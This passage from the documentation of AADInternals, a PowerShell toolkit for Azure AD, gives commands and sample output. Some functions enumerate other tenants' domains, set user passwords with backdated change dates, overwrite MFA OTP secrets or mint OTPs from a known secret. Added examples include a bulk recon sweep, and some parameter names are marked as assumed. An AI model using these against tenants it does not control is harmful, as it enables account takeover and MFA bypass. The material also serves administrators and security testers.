MarketingNotificationEmails              : 
MultipleDataLocationsForServicesEnabled  : 
ObjectId                                 : 6c1a3ac3-5416-4dd0-984e-228cc80dbc9f
PasswordSynchronizationEnabled           : true
PortalSettings                           : PortalSettings
PostalCode                               : 
PreferredLanguage                        : en
ReleaseTrack                             : StagedRollout
ReplicationScope                         : EU
RmsViralSignUpEnabled                    : false
SecurityComplianceNotificationEmails     : 
SecurityComplianceNotificationPhones     : 
SelfServePasswordResetEnabled            : false
ServiceInformation                       : ServiceInformation
ServiceInstanceInformation               : ServiceInstanceInformation
State                                    : 
Street                                   : 
SubscriptionProvisioningLimited          : false
TechnicalNotificationEmails              : TechnicalNotificationEmails
TelephoneNumber                          : 123456789
UIExtensibilityUris                      : 
UsersPermissionToCreateGroupsEnabled     : false
UsersPermissionToCreateLOBAppsEnabled    : false
UsersPermissionToReadOtherUsersEnabled   : true
UsersPermissionToUserConsentToAppEnabled : false

Get-AADIntCompanyTags (A)

This function returns tags attached to the tenant. Microsoft uses these to identify the status of certain changes, such as a SharePoint version update.

Example:

# Get the tags of the tenant
Get-AADIntCompanyTags

Output:

azure.microsoft.com/azure=active
o365.microsoft.com/startdate=635711754831829038
o365.microsoft.com/version=15
o365.microsoft.com/signupexperience=GeminiSignUpUI
o365.microsoft.com/14to15UpgradeScheduled=True
o365.microsoft.com/14to15UpgradeCompletedDate=04-16-2013

Get-AADIntSyncConfiguration (A)

This function returns synchronisation details.

Example:

# Get tenant sync configuration
Get-AADIntSyncConfiguration

Output:

TresholdCount                           : 501
UserContainer                           : 
TenantId                                : 6c1a3ac3-5416-4dd0-984e-228cc80dbc9f
ApplicationVersion                      : 1651564e-7ce4-4d99-88be-0a65050d8dc3
DisplayName                             : Company Ltd
IsPasswordSyncing                       : true
AllowedFeatures                         : {ObjectWriteback,  , PasswordWriteback}
PreventAccidentalDeletion               : EnabledForCount
TotalConnectorSpaceObjects              : 15
MaxLinksSupportedAcrossBatchInProvision : 15000
UnifiedGroupContainer                   : 
IsTrackingChanges                       : false
ClientVersion                           : 1.1.882.0
DirSyncFeatures                         : 41021
SynchronizationInterval                 : PT30M
AnchorAttribute                         : 
DirSyncClientMachine                    : SERVER2016
IsDirSyncing                            : true
TresholdPercentage                      : 0

Get-AADIntTenantDomains (E)

Since version 0.1.6
This function returns all domains of the tenant the given domain is registered to. The user running the function MUST have the Global Admin / Company Administrator role in their own tenant, but no rights to the target tenant are needed. Works fine with trial tenants too.

Example:

# Get the access token
$at = Get-AADIntAccessTokenForEXO

# List domains from tenant where company.com is registered
Get-AADIntTenantDomains -AccessToken $at -Domain company.com

Output:

company.com
company.fi
company.co.uk
company.onmicrosoft.com
company.mail.onmicrosoft.com
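The unauthenticated functions above (Get-AADIntLoginInformation, Get-AADIntTenantID) and the authenticated Get-AADIntTenantDomains are most useful together, run over a list of domains: the first two tell you whether each domain is managed or federated and where its STS lives, the third expands a domain into every other domain of the same tenant. The following is an added example, not code from AADInternals or its author, that chains them into a two-stage sweep. It requires the module and Internet access; the target list is a constructed placeholder, the property names are the ones shown in the Get-AADIntLoginInformation output above, and the Exchange Online token must come from your own tenant, as the text above notes.

```powershell
# Added example, not part of AADInternals: bulk reconnaissance of several domains
# with the functions documented above. Needs the module and Internet access; the
# target list is a constructed placeholder.
Import-Module AADInternals

$targets = @('company.com', 'company.fi')    # constructed sample input

# Stage 1: no authentication needed; only Microsoft's login endpoints are queried
$recon = foreach ($domain in $targets) {
    try {
        $login = Get-AADIntLoginInformation -Domain $domain
        [PSCustomObject]@{
            Domain      = $domain
            TenantId    = Get-AADIntTenantID -Domain $domain
            AccountType = $login.'Account Type'           # Managed (cloud/PHS/PTA) or Federated
            Federation  = $login.'Federation Protocol'    # e.g. WSTrust for AD FS
            AuthUrl     = $login.'Authentication Url'     # on-prem STS when federated
            DesktopSso  = $login.'Desktop Sso Enabled'
        }
    } catch {
        Write-Warning "$domain : $($_.Exception.Message)"
    }
}
$recon | Format-Table -AutoSize

# Stage 2: needs an Exchange Online token from YOUR tenant (Global Admin there);
# no rights in the target tenants are required
$at = Get-AADIntAccessTokenForEXO

$byTenant = foreach ($r in ($recon | Where-Object TenantId | Sort-Object TenantId -Unique)) {   # one query per tenant
    $domains = @(Get-AADIntTenantDomains -AccessToken $at -Domain $r.Domain)
    [PSCustomObject]@{
        TenantId    = $r.TenantId
        SeedDomain  = $r.Domain
        DomainCount = $domains.Count
        OnMicrosoft = ($domains | Where-Object { $_ -like '*.onmicrosoft.com' }) -join ', '
        Others      = ($domains | Where-Object { $_ -notlike '*.onmicrosoft.com' }) -join ', '
    }
}
$byTenant | Format-List
```

Two targets that resolve to the same TenantId are the same organisation, which is why stage 2 de-duplicates on it before spending a query. For a defender the same sweep is an inventory check: any federated domain whose AuthUrl points at an STS you do not recognise deserves a closer look.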

Get-AADIntKerberosDomainSyncConfig (A)

Since version 0.3.1
Gets the tenant’s Kerberos domain sync configuration using the Azure AD Sync API.

Example:

# Get the access token
$at = Get-AADIntAccessTokenForAADGraph

# Dump the Kerberos domain sync config
Get-AADIntKerberosDomainSyncConfig -AccessToken $at

Output:

PublicEncryptionKey                                                                              SecuredEncryptionAlgorithm SecuredKeyId SecuredPartitionId
-------------------                                                                              -------------------------- ------------ ------------------
RUNLMSAAAABOD8OPj7I3nfeuh7ELE47OtA3yvyryQ0wamf5jPy2uGKibaTRKJd/kFexTpJ8siBxszKCXC2sn1Fd9pEG2y7fu 5                          2            15001 

Get-AADIntWindowsCredentialsSyncConfig (A)

Since version 0.3.1
Gets the tenant’s Windows credentials synchronization config.

Example:

# Get the access token
$at = Get-AADIntAccessTokenForAADGraph

# Dump the Windows Credentials sync
Get-AADIntWindowsCredentialsSyncConfig -AccessToken $at

Output:

EnableWindowsLegacyCredentials EnableWindowsSupplementaCredentials SecretEncryptionCertificate                                                                            
------------------------------ ----------------------------------- ---------------------------                                                                            
                          True                               False MIIDJTCCAg2gAwIBAgIQFwRSInW7I...

Get-AADIntSyncDeviceConfiguration (A)

Since version 0.3.1
Gets the tenant’s sync device configuration (issuer certificates). Does not require admin rights.

Example:

# Get the access token
$at = Get-AADIntAccessTokenForAADGraph

# Dump the Sync Device configuration
Get-AADIntSyncDeviceConfiguration -AccessToken $at

Output:

PublicIssuerCertificates CloudPublicIssuerCertificates                                                                                                                    
------------------------ -----------------------------                                                                                                                    
{$null}                  {MIIDejCCAmKgAwIBAgIQzsvx7rE77rJM...

Get-AADIntTenantAuthPolicy (M)

Since version 0.4.3
Gets tenant’s authorization policy, including user and guest settings.

Example:

# Get the access token
Get-AADIntAccessTokenForMSGraph -SaveToCache

# Dump the tenant authorization policy
Get-AADIntTenantAuthPolicy

Output:

id                                                : authorizationPolicy
allowInvitesFrom                                  : everyone
allowedToSignUpEmailBasedSubscriptions            : True
allowedToUseSSPR                                  : True
allowEmailVerifiedUsersToJoinOrganization         : False
blockMsolPowerShell                               : False
displayName                                       : Authorization Policy
description                                       : Used to manage authorization related settings across the company.
enabledPreviewFeatures                            : {}
guestUserRoleId                                   : a0b1b346-4d3e-4e8b-98f8-753987be4970
permissionGrantPolicyIdsAssignedToDefaultUserRole : {microsoft-user-default-legacy}
defaultUserRolePermissions                        : @{allowedToCreateApps=True; allowedToCreateSecurityGroups=True;
                                                    allowedToReadOtherUsers=True}

Get-AADIntTenantGuestAccess (M)

Since version 0.4.3
Gets the guest access level of the user’s tenant.

Access level Description
------------ -----------
Inclusive    Guest users have the same access as members
Normal       Guest users have limited access to properties and memberships of directory objects
Restricted   Guest user access is restricted to properties and memberships of their own directory objects (most restrictive)

Example:

# Get the access token
Get-AADIntAccessTokenForMSGraph -SaveToCache

# Get the tenant guest access
Get-AADIntTenantGuestAccess

Output:

Access Description                                                                        RoleId                              
------ -----------                                                                        ------                              
Normal Guest users have limited access to properties and memberships of directory objects 10dae51f-b6af-4016-8d66-8c2a99b929b3

Set-AADIntTenantGuestAccess (M)

Since version 0.4.3
Sets the guest access level of the user’s tenant.

Access level Description
------------ -----------
Inclusive    Guest users have the same access as members
Normal       Guest users have limited access to properties and memberships of directory objects
Restricted   Guest user access is restricted to properties and memberships of their own directory objects (most restrictive)

Example:

# Get the access token
Get-AADIntAccessTokenForMSGraph -SaveToCache

# Set the tenant guest access level (Inclusive, Normal or Restricted); the -Level parameter name is assumed here
Set-AADIntTenantGuestAccess -Level Normal

Output:

Access Description                                                                        RoleId                              
------ -----------                                                                        ------                              
Normal Guest users have limited access to properties and memberships of directory objects 10dae51f-b6af-4016-8d66-8c2a99b929b3

Enable-AADIntTenantMsolAccess (M)

Since version 0.4.3
Enables Msol PowerShell module access for the user’s tenant.

Example:

# Get the access token
Get-AADIntAccessTokenForMSGraph -SaveToCache

# Enable the Msol PowerShell module access
Enable-AADIntTenantMsolAccess

# Check the settings
Get-AADIntTenantAuthPolicy | Select block*

Output:

blockMsolPowerShell
-------------------
              False

Disable-AADIntTenantMsolAccess (M)

Since version 0.4.3
Disables Msol PowerShell module access for the user’s tenant.

Example:

# Get the access token
Get-AADIntAccessTokenForMSGraph -SaveToCache

# Disable the Msol PowerShell module access
Disable-AADIntTenantMsolAccess

# Check the settings after 10 seconds or so.
Get-AADIntTenantAuthPolicy | Select block*

Output:

blockMsolPowerShell
-------------------
              True

Utilities

Utilities provide the functionality for troubleshooting etc.

Read-AADIntAccesstoken (*)

This function shows access (and id and refresh) token information. For debugging, the most important values are the audience (aud) and the issuer (iss). Use the -Validate switch to validate the signature and to check the expiration.

You can also show details of a token copied from the browser session’s Authorization header.

Example1:

# Show access token information
$at = Get-AADIntAccessTokenForAADGraph
Read-AADIntAccesstoken $at

Output1:

aud                 : https://graph.windows.net
iss                 : https://sts.windows.net/fe177079-66f4-4f9f-bcb6-e085b92e3c8a/
iat                 : 1540478026
nbf                 : 1540478026
exp                 : 1540481926
acr                 : 1
aio                 : ASQA2/8JAAAAXhS3vMo2OGlXvBZG0tScm9njsJUDhvoHtwdSlUx2Jvg=
amr                 : {pwd}
appid               : 1b730954-1685-4b74-9bfd-dac224a7b894
appidacr            : 0
family_name         : demo
given_name          : admin
ipaddr              : 127.0.0.1
name                : admin demo
oid                 : 69be7da7-e29f-4753-b8c7-0417a63a1804
puid                : 1003BFFDABE606EE
scp                 : user_impersonation
sub                 : SaN7kFxdXhzQN6B7C8ThGEg4gBIrcXo3lzcayeoReps
tenant_region_scope : EU
tid                 : 6217f557-602d-4fc8-b2f9-5cb948f6ce26
unique_name         : admin@company.onmicrosoft.com
upn                 : admin@company.onmicrosoft.com
uti                 : bH3Bzy9D5ESLcW_S0KkoAA
ver                 : 1.0

Example2:

# Show access token information
Read-AADIntAccesstoken $at -Validate

Output2:

Read-Accesstoken : Access Token is expired
    At line:1 char:1
    + Read-Accesstoken -AccessToken $at -Validate -verbose
    + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        + CategoryInfo          : NotSpecified: (:) [Write-Error], WriteErrorException
        + FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,Read-Accesstoken
        
aud                 : https://graph.windows.net
iss                 : https://sts.windows.net/fe177079-66f4-4f9f-bcb6-e085b92e3c8a/
iat                 : 1540478026
nbf                 : 1540478026
exp                 : 1540481926
acr                 : 1
aio                 : ASQA2/8JAAAAXhS3vMo2OGlXvBZG0tScm9njsJUDhvoHtwdSlUx2Jvg=
amr                 : {pwd}
appid               : 1b730954-1685-4b74-9bfd-dac224a7b894
appidacr            : 0
family_name         : demo
given_name          : admin
ipaddr              : 127.0.0.1
name                : admin demo
oid                 : 69be7da7-e29f-4753-b8c7-0417a63a1804
puid                : 1003BFFDABE606EE
scp                 : user_impersonation
sub                 : SaN7kFxdXhzQN6B7C8ThGEg4gBIrcXo3lzcayeoReps
tenant_region_scope : EU
tid                 : 6217f557-602d-4fc8-b2f9-5cb948f6ce26
unique_name         : admin@company.onmicrosoft.com
upn                 : admin@company.onmicrosoft.com
uti                 : bH3Bzy9D5ESLcW_S0KkoAA
ver                 : 1.0
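As an added example (not the module’s code), here is a Python reimplementation of what Read-AADIntAccesstoken does with a token: split the three base64url segments, decode the claims, and check aud, iss and exp. The sample token is constructed from the claims shown above with a placeholder signature, so it is not signed by Azure AD; the signature check that -Validate performs is not done here, which is why decoded claims must be treated as untrusted until that check passes.

```python
import base64
import json
import time

# Claims taken from the Read-AADIntAccesstoken output above; the header and the
# signature bytes are constructed, so this token is NOT signed by Azure AD.
SAMPLE_HEADER = {"typ": "JWT", "alg": "RS256", "kid": "constructed-key-id"}
SAMPLE_CLAIMS = {
    "aud": "https://graph.windows.net",
    "iss": "https://sts.windows.net/fe177079-66f4-4f9f-bcb6-e085b92e3c8a/",
    "iat": 1540478026,
    "nbf": 1540478026,
    "exp": 1540481926,
    "upn": "admin@company.onmicrosoft.com",
    "scp": "user_impersonation",
}


def b64url_encode(data: bytes) -> str:
    # JWT segments use base64url without '=' padding.
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    # Restore the padding that JWTs strip; without it the decoder raises.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def make_sample_token() -> str:
    """Build the constructed sample token (header.payload.signature)."""
    header = b64url_encode(json.dumps(SAMPLE_HEADER).encode())
    payload = b64url_encode(json.dumps(SAMPLE_CLAIMS).encode())
    signature = b64url_encode(b"\x00" * 32)  # placeholder, not a real RSA signature
    return f"{header}.{payload}.{signature}"


def read_access_token(token: str) -> tuple:
    """Split a JWT into (header, claims) WITHOUT verifying the signature."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a JWS compact token: expected 3 dot-separated segments")
    header = json.loads(b64url_decode(parts[0]))
    claims = json.loads(b64url_decode(parts[1]))
    return header, claims


def check_claims(claims: dict, expected_aud: str, expected_iss: str, now: int = None) -> list:
    """Return a list of problems; an empty list means aud, iss and the time window
    look right. This covers only the audience/issuer/expiry part of -Validate; the
    signature is not checked, so the claims are still untrusted input."""
    now = int(time.time()) if now is None else now
    problems = []
    if claims.get("aud") != expected_aud:
        problems.append(f"audience is {claims.get('aud')!r}, expected {expected_aud!r}")
    if claims.get("iss") != expected_iss:
        problems.append(f"issuer is {claims.get('iss')!r}, expected {expected_iss!r}")
    if "exp" not in claims or now >= claims["exp"]:
        problems.append("Access Token is expired")
    if now < claims.get("nbf", 0):
        problems.append("Access Token is not yet valid (nbf is in the future)")
    return problems
```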

Get-AADIntCertificate (*)

This function loads a certificate from a .pfx file into a variable. Used to create SAML tokens.

Example:

# Load certificate to a variable
$cert = Get-AADIntCertificate -FileName 'C:\temp\cert.pfx' -Password 'mypassword'

Output:

Thumbprint                                Subject                                                                                                                                                                                                    
----------                                -------                                                                                                                                                                                                    
7fb507489addeee4dff2f64c68d1970c28b0da62  CN=sign.company.com, O=Company, S=Alaska, C=US

Get-AADIntImmutableID (*)

This function returns the ImmutableId for the given ADUser object. Must be run on a computer that has the ActiveDirectory module installed.

Example:

# Get ImmutableId for an ADUser (the -ADUser parameter name is assumed here)
Get-AADIntImmutableID -ADUser (Get-ADUser -Identity "user")

Output:

Zjk1OGUxZTctNDE4ZS00Njk5LTg1ZjgtN2YyNGM2NTcwNW==

Start-AADIntCloudShell (C)

Since version 0.4.3
Starts an Azure Cloud Shell (PowerShell) session for the given user. Use the -Shell bash parameter to start a Bash session.

Note! Does not work with VSCode or ISE.

Example:

# Get access token and save to cache
Get-AADIntAccessTokenForCloudShell -SaveToCache

# Start the cloud shell (PowerShell)
Start-AADIntCloudShell

User manipulation

User manipulation functions provide the basic user adding/editing/deleting functionality and some extras.

Get-AADIntUsers (A)

This function returns users of the tenant.

Example:

# Get users
Get-AADIntUsers | Select UserPrincipalName,ObjectId,ImmutableId

Output:

UserPrincipalName                                               ObjectId                             ImmutableId             
-----------------                                               --------                             -----------  
LeeG@company.com                                                2eee0a36-9e2f-4985-80e1-4172ed8b3213 7jYndBUFCEqlXQNZEO3uwQ==
LidiaH@company.com                                              34289155-2798-432d-9398-53e7e0918f38 W3clIieLs0ivUeoY1lu1fg==
AllanD@company.com                                              3a0eea57-9f74-4ee5-8e84-353c35581cc2 BzPotuy3G0ySBJN5tZwB4w==

Get-AADIntUser (A)

This function returns information for the given user.

Example:

# Get user information
Get-AADIntUser -UserPrincipalName "LeeG@company.com"

Output:

AlternateEmailAddresses                : 
AlternateMobilePhones                  : 
AlternativeSecurityIds                 : 
BlockCredential                        : false
City                                   : 
CloudExchangeRecipientDisplayType      : 1073741824
Country                                : 
Department                             : Manufacturing
DirSyncProvisioningErrors              : 
DisplayName                            : Lee Gu
Errors                                 : 
Fax                                    : 
FirstName                              : Lee
ImmutableId                            : 7jYndBUFCEqlXQNZEO3uwQ==
IndirectLicenseErrors                  : 
IsBlackberryUser                       : false
IsLicensed                             : true
LastDirSyncTime                        : 2018-06-26T11:04:16Z
LastName                               : Gu
LastPasswordChangeTimestamp            : 2017-10-03T04:44:43Z
LicenseAssignmentDetails               : LicenseAssignmentDetails
LicenseReconciliationNeeded            : false
Licenses                               : Licenses
LiveId                                 : 1003BFFDABE61DB7
MSExchRecipientTypeDetails             : 
MSRtcSipDeploymentLocator              : 
MSRtcSipPrimaryUserAddress             : 
MobilePhone                            : 
OathTokenMetadata                      : 
ObjectId                               : 2eee0a36-9e2f-4985-80e1-4172ed8b3213
Office                                 : 23/3101
OverallProvisioningStatus              : PendingInput
PasswordNeverExpires                   : true
PasswordResetNotRequiredDuringActivate : true
PhoneNumber                            : +1 913 555 0101
PortalSettings                         : 
PostalCode                             : 66210
PreferredDataLocation                  : 
PreferredLanguage                      : 
ProxyAddresses                         : ProxyAddresses
ReleaseTrack                           : 
ServiceInformation                     : 
SignInName                             : LeeG@company.com
SoftDeletionTimestamp                  : 
State                                  : KS
StreetAddress                          : 10801 Mastin Blvd., Suite 620
StrongAuthenticationMethods            : 
StrongAuthenticationPhoneAppDetails    : 
StrongAuthenticationProofupTime        : 
StrongAuthenticationRequirements       : 
StrongAuthenticationUserDetails        : 
StrongPasswordRequired                 : true
StsRefreshTokensValidFrom              : 2017-10-03T04:44:43Z
Title                                  : Director
UsageLocation                          : FI
UserLandingPageIdentifierForO365Shell  : 
UserPrincipalName                      : LeeG@company.com
UserThemeIdentifierForO365Shell        : 
UserType                               : Member
ValidationStatus                       : Healthy
WhenCreated                            : 2018-06-26T11:04:14Z

New-AADIntUser (A)

This function creates a new user. Currently supports only UserPrincipalName and DisplayName.

Example:

# Create a new user
New-AADIntUser -UserPrincipalName "user@company.com" -DisplayName "New User"

Output:

AlternateEmailAddresses                : 
AlternateMobilePhones                  : 
AlternativeSecurityIds                 : 
BlockCredential                        : false
City                                   : 
CloudExchangeRecipientDisplayType      : 
Country                                : 
Department                             : 
DirSyncProvisioningErrors              : 
DisplayName                            : New User
Errors                                 : 
Fax                                    : 
FirstName                              : 
ImmutableId                            : 
IndirectLicenseErrors                  : 
IsBlackberryUser                       : false
IsLicensed                             : false
LastDirSyncTime                        : 
LastName                               : 
LastPasswordChangeTimestamp            : 2018-10-25T15:13:10.8686574Z
LicenseAssignmentDetails               : 
LicenseReconciliationNeeded            : false
Licenses                               : 
LiveId                                 : 1003BFFDAEE167C0
MSExchRecipientTypeDetails             : 
MSRtcSipDeploymentLocator              : 
MSRtcSipPrimaryUserAddress             : 
MobilePhone                            : 
OathTokenMetadata                      : 
ObjectId                               : 13e121db-4132-43c8-a784-a9b12f2bd4e3
Office                                 : 
OverallProvisioningStatus              : None
PasswordNeverExpires                   : false
PasswordResetNotRequiredDuringActivate : 
PhoneNumber                            : 
PortalSettings                         : 
PostalCode                             : 
PreferredDataLocation                  : 
PreferredLanguage                      : 
ProxyAddresses                         : 
ReleaseTrack                           : 
ServiceInformation                     : 
SignInName                             : new.user@company.com
SoftDeletionTimestamp                  : 
State                                  : 
StreetAddress                          : 
StrongAuthenticationMethods            : 
StrongAuthenticationPhoneAppDetails    : 
StrongAuthenticationProofupTime        : 
StrongAuthenticationRequirements       : 
StrongAuthenticationUserDetails        : 
StrongPasswordRequired                 : true
StsRefreshTokensValidFrom              : 2018-10-25T15:13:10.8686574Z
Title                                  : 
UsageLocation                          : 
UserLandingPageIdentifierForO365Shell  : 
UserPrincipalName                      : new.user@company.com
UserThemeIdentifierForO365Shell        : 
UserType                               : Member
ValidationStatus                       : Healthy
WhenCreated                            : 
Password                               : Tog59451

Set-AADIntUser (A)

This function changes user’s information.

Example:

# Set user information
Set-AADIntUser -UserPrincipalName "user@company.com" -FirstName "Dave"

Remove-AADIntUser (A)

This function removes a user.

Example:

# Remove the user
Remove-AADIntUser -UserPrincipalName "user@company.com"

Get-AADIntGlobalAdmins (A)

This function returns all Global Admins of the tenant.

Example:

# Get global admins
Get-AADIntGlobalAdmins

Output:

DisplayName    UserPrincipalName                 
-----------    -----------------                 
admin demo     admin@company.onmicrosoft.com
Dave the Admin dave@company.com            

User MFA manipulation

Get-AADIntUserMFA (A)

Since version 0.2.8
Gets user’s MFA settings

Example:

# Get the access token
Get-AADIntAccessTokenForAADGraph -SaveToCache
    
# Get user's MFA settings 
Get-AADIntUserMFA -UserPrincipalName user@company.com

Output:

UserPrincipalName      : user@company.com
State                  : Enforced
PhoneNumber            : +1 123456789
AlternativePhoneNumber : +358 123456789
Email                  : someone@hotmail.com
DefaultMethod          : OneWaySMS
Pin                    : 
OldPin                 : 
StartTime              :          

Set-AADIntUserMFA (A)

Since version 0.2.8
Sets user’s MFA settings

Example:

# Get the access token
Get-AADIntAccessTokenForAADGraph -SaveToCache
    
# Set user's MFA settings 
Set-AADIntUserMFA -UserPrincipalName "user@company.com" -PhoneNumber "+1 123456789" -DefaultMethod PhoneAppNotification

Get-AADIntUserMFAApps (A)

Since version 0.4.0
Gets user’s MFA Authentication App settings

Example:

# Get the access token
Get-AADIntAccessTokenForAADGraph -SaveToCache
    
# Get user's MFA apps settings 
Get-AADIntUserMFAApps -UserPrincipalName "user@company.com"

Output:

AuthenticationType : Notification, OTP
DeviceName         : SM-R2D2
DeviceTag          : SoftwareTokenActivated
DeviceToken        : APA91...
Id                 : 454b8d53-d97e-4ead-a69c-724166394334
NotificationType   : GCM
OathTokenTimeDrift : 0
OathSecretKey      :
PhoneAppVersion    : 6.2001.0140
TimeInterval       :

AuthenticationType : OTP
DeviceName         : NO_DEVICE
DeviceTag          : SoftwareTokenActivated
DeviceToken        : NO_DEVICE_TOKEN
Id                 : aba89d77-0a69-43fa-9e5d-6f41c7b9bb16
NotificationType   : Invalid
OathTokenTimeDrift : 0
OathSecretKey      :
PhoneAppVersion    : NO_PHONE_APP_VERSION
TimeInterval       :         

Set-AADIntUserMFAApps (A)

Since version 0.4.0
Sets user’s MFA Authentication App settings.

Example:

# Set user's MFA apps settings 
Set-AADIntUserMFAApps -UserPrincipalName "user@company.com" -Id 454b8d53-d97e-4ead-a69c-724166394334 -DeviceName "SM-3CPO"

New-AADIntOTPSecret

Since version 0.4.0
Generates a one-time-password (OTP) secret which can be used to reset user’s OathSecretKey.

Note! Set only for “apps” whose AuthenticationType is OTP!

Example 1:

# Generate a new OTP secret
New-AADIntOTPSecret

Output:

njny7gdb6tnfihy3

# Change the user's OathSecretKey
Set-AADIntUserMFAApps -UserPrincipalName "user@company.com" -Id aba89d77-0a69-43fa-9e5d-6f41c7b9bb16 -OathSecretKey "njny7gdb6tnfihy3"

Example 2:

# Generate OTP secret
New-AADIntOTPSecret -Clipboard

Output:

OTP secret copied to clipboard.

New-AADIntOTP

Since version 0.4.0
Generates a one-time-password (OTP) using the given secret. Can be used for MFA if the user’s secret is known.

Example 1:

# Generate OTP
New-AADIntOTP -SecretKey "rrc2 wntz dkbu iikb"

Output:

OTP     Valid
---     -----
502 109 26s

Example 2:

# Generate OTP
New-AADIntOTP -SecretKey "rrc2 wntz dkbu iikb" -Clipboard

Output:

OTP copied to clipboard, valid for 26s
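As an added example (not the module’s code), this Python implementation of RFC 6238 TOTP shows what New-AADIntOTP computes from a secret written as above: the base32 secret is normalised (spaces removed, upper-cased, padded), HMAC-SHA1 over the 30-second counter is truncated to 6 digits, and the remaining validity is the rest of the current window. The RFC 6238 reference secret is included so the output can be checked against published test vectors; "rrc2 wntz dkbu iikb" is only used to show the decoding.

```python
import base64
import hashlib
import hmac
import struct
import time

# RFC 6238 reference secret "12345678901234567890" in base32, so results can be
# checked against the RFC's SHA-1 test vectors (constructed for this example).
RFC6238_SECRET_B32 = "GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ"
# A secret in the same spaced, lower-case format as the New-AADIntOTP example above.
PAGE_STYLE_SECRET = "rrc2 wntz dkbu iikb"

TIME_STEP = 30   # seconds per TOTP window
DIGITS = 6       # Authenticator-style 6-digit codes


def decode_secret(secret: str) -> bytes:
    """Accept secrets written with spaces and lower case, as in the example above."""
    cleaned = secret.replace(" ", "").upper()
    cleaned += "=" * (-len(cleaned) % 8)  # base32 input must be padded to a multiple of 8
    return base64.b32decode(cleaned)


def hotp(key: bytes, counter: int, digits: int = DIGITS) -> str:
    """RFC 4226 HMAC-based OTP with dynamic truncation."""
    msg = struct.pack(">Q", counter)                     # 8-byte big-endian counter
    digest = hmac.new(key, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                           # low nibble of last byte
    code = int.from_bytes(digest[offset:offset + 4], "big") & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)      # keep leading zeros


def totp(secret: str, unix_time: int = None) -> tuple:
    """Return (code, seconds_left) for the secret at the given Unix time (default: now)."""
    unix_time = int(time.time()) if unix_time is None else unix_time
    counter = unix_time // TIME_STEP
    seconds_left = TIME_STEP - (unix_time % TIME_STEP)
    return hotp(decode_secret(secret), counter), seconds_left


def format_otp(code: str) -> str:
    """Render a 6-digit code as 'nnn nnn', like the OTP column above."""
    return f"{code[:3]} {code[3:]}"


if __name__ == "__main__":
    code, left = totp(PAGE_STYLE_SECRET)
    print(f"OTP {format_otp(code)} valid for {left}s")
```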

User manipulation with AD sync api

These functions allow manipulating Azure AD objects in ways that are otherwise impossible.

NOTE! These functions use the Azure AD synchronization API and may cause severe harm to the tenant!! USE AT YOUR OWN RISK!

Get-AADIntSyncObjects (A)

This function returns all Azure AD objects that are not synced to the on-premises AD.

Example:

# Get synchronisable objects from AAD
Get-AADIntSyncObjects | Select UserPrincipalName

Output:

UserPrincipalName          
-----------------          
BrianJ@company.com            
LynneR@company.com                        
MiriamG@company.com                       
AllanD@company.com                        
IsaiahL@company.com               

Set-AADIntAzureADObject (A)

This function creates a new or modifies an existing Azure AD object.

Allows setting all Azure AD attributes. The sourceAnchor attribute is the most important one and is set automatically only for synced users. This is typically the ImmutableID (the Base64-encoded GUID of the on-prem AD object), but it can be any string that is unique tenant-wide.

Example:

# Create a new user
Set-AADIntAzureADObject -userPrincipalName "someone@company.com" -sourceAnchor "ABC" -netBiosName "COMPANY" # netBiosName value is a placeholder

Output:

CloudAnchor            : User_d14f7322-c997-4e87-912b-f43c906cec81
ErrorDetails           : ErrorDetails
ObjectType             : User
ResultCode             : Success
ResultErrorCode        : 0
ResultErrorDescription : ResultErrorDescription
SourceAnchor           : ABC
SyncOperation          : Add

Remove-AADIntAzureADObject (A)

This function removes an AAD object.

Example:

# Remove AAD object
Remove-AADIntAzureADObject -sourceAnchor ABC

Output:

CloudAnchor            : User_d14f7322-c997-4e87-912b-f43c906cec81
ErrorDetails           : ErrorDetails
ObjectType             : User
ResultCode             : Success
ResultErrorCode        : 0
ResultErrorDescription : ResultErrorDescription
SourceAnchor           : ABC
SyncOperation          : Add

Set-AADIntUserPassword (A)

This function sets the user’s password. The last change time can also be set, but it must be before the current time.

Example:

# Set the password and the change date to 1/1/1970
Set-AADIntUserPassword -SourceAnchor qIMPTm2Q3kimHgg4KQyveA== -Password "a" -ChangeDate 1/1/1970

Output: (Result 0 = success)

CloudAnchor Result SourceAnchor            
----------- ------ ------------            
CloudAnchor 0      qIMPTm2Q3kimHgg4KQyveA==

Example:

# Set the password and the change date to 1/1/1970
Set-AADIntUserPassword -CloudAnchor "User_60f87269-f258-4473-8cca-267b50110e7a" -Password "a" -ChangeDate 1/1/1970

Output: (Result 0 = success)

CloudAnchor                               Result SourceAnchor            
-----------                               ------ ------------            
User_60f87269-f258-4473-8cca-267b50110e7a 0      SourceAnchor

Reset-AADIntServiceAccount (A)

This function creates a new service account (or resets the password of an existing one). The created user will have the DirectorySynchronizationAccount role.

Azure AD Connect uses this during the configuration stage to create the service account and stores the username and password to the configuration database.

Example:

# Create a new service account for AD sync
Reset-AADIntServiceAccount -ServiceAccount Sync_MyServer_nnnnnnn

Output:

Password         UserName                                          
--------         --------                                          
5(]lCy=Q{.#@lb}p Sync_MyServer_nnnnnnn@company.onmicrosoft.com

Exchange Online functions

Exchange Online functions are used to manipulate devices and send mail using ActiveSync and Outlook APIs. Functions marked with E use an Exchange Online access token.

Get-AADIntEASAutoDiscover (*)

Since version 0.1.6
Returns endpoints for the given protocol for the given email address. If the email address is invalid (i.e. the user does not exist) this takes a very long time.

Example:

# Get endpoint for EWS api
Get-AADIntEASAutoDiscover -Email "some.user@company.com" -Protocol Ews

Output:

Protocol  Url                         
--------  ---                         
Substrate https://substrate.office.com

Get-AADIntEASAutoDiscoverV1 (E)

Since version 0.1.6
Returns ActiveSync endpoint for the given user (credentials or access token).

Example:

# Get credentials
$Cred=Get-Credential
# Get endpoint for ActiveSync
Get-AADIntEASAutoDiscoverV1 -Credentials $Cred

Output:

https://outlook.office365.com/Microsoft-Server-ActiveSync

Set-AADIntEASSettings (E)

Since version 0.1.6
Adds new or modifies existing ActiveSync device for the given user (credentials or access token). The added or modified device can be used to send emails with Send-AADIntEASMessage

Example:

# Get credentials
$Cred=Get-Credential
